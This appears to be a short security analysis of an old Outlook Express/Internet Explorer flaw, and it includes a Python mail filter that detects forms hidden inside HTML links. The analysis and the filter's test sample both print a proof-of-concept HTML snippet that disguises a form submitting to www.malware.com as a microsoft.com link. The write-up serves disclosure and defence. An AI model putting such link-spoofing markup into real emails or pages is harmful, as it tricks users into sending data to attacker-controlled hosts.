Information Assurance

CHARLES NAILEN



Bugtraq Analysis

Malicious Form exploit in Outlook Express/Internet Explorer


Microsoft's Outlook Express is a popular free e-mail client used to download and view POP3 and IMAP e-mail messages. Outlook Express, and its more feature-rich cousin Microsoft Outlook, allow e-mail messages to be written in plaintext as well as HTML format.

In this attack, a malicious user sends an HTML-formatted e-mail message in which a form post command is embedded in an HTML link. Internet Explorer, the program Outlook and Outlook Express typically use to render HTML documents, will then execute the form's action while the user thinks he is merely clicking on a link. Normally, words or graphics are the primary things that would be anchored as links. However, if an entire form is presented as a link, IE designates the form as a link and the fake address appears in Internet Explorer's status bar; instead of going to the address referenced in the link, Internet Explorer executes the code in the form.

 

Code:

<A href="http://www.microsoft.com">
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com>
</A>


What Could Have Prevented It?

The problem arises in how Internet Explorer interprets the HTML code. Since the form is embedded into a link reference, IE should have ignored any executable code inside the link.

Workarounds:

Don't click on links in HTML e-mails when viewing them through Microsoft Outlook.

Type addresses into Internet Explorer instead of clicking on links. (yeah right)

What Can Be Done to Prevent This in the Future?

Alter Internet Explorer so that form data is not executed when it is embedded inside a link reference.
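
Until the client is fixed, the same pattern can be caught before delivery. The following is an added example, not part of the original analysis: a mail-filter check that parses an HTML message body and reports any form or submit control nested inside an open link, and whether the form posts to a different host than the link shows. The class and function names are hypothetical, and the sample inputs are constructed (SAMPLE mirrors the snippet above).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormInLinkFinder(HTMLParser):
    """Collect <form> and submit controls that open while an <a href> is open."""

    def __init__(self):
        super().__init__()
        self.anchors = []    # href (or None) of each currently open <a>
        self.findings = []   # (visible link href, element, form action or button value)

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)   # HTMLParser lowercases tag and attribute names
        href = next((h for h in reversed(self.anchors) if h), None)
        if tag == "a":
            self.anchors.append(attr.get("href"))
        elif href and tag == "form":
            self.findings.append((href, tag, attr.get("action") or ""))
        elif href and tag in ("input", "button"):
            if (attr.get("type") or "").lower() in ("submit", "image"):
                self.findings.append((href, tag, attr.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "a" and self.anchors:
            self.anchors.pop()

def _host(url):
    return (urlparse(url).hostname or "").lower()

def scan_html_body(html):
    """Return one dict per finding. host_mismatch is True when a nested form
    submits to a host other than the one the link shows (a relative or
    missing action counts as a mismatch)."""
    finder = FormInLinkFinder()
    finder.feed(html)
    finder.close()
    return [{"href": h, "element": el, "target": t,
             "host_mismatch": el == "form" and _host(t) != _host(h)}
            for h, el, t in finder.findings]

# Constructed inputs: SAMPLE mirrors the snippet on this page (style attribute
# omitted); BENIGN is an ordinary link followed by a separate form.
SAMPLE = ('<A href="http://www.microsoft.com">'
          '<FORM action=http://www.malware.com/t-bill.html method=get>'
          '<INPUT type=submit value=http://www.microsoft.com></A>')
BENIGN = ('<a href="http://www.example.com/">example</a>'
          '<form action="/search"><input type=submit value=Go></form>')
```

A filter built on this would quarantine or rewrite any message for which `scan_html_body` returns a finding, since legitimate mail has no reason to nest a form inside a link.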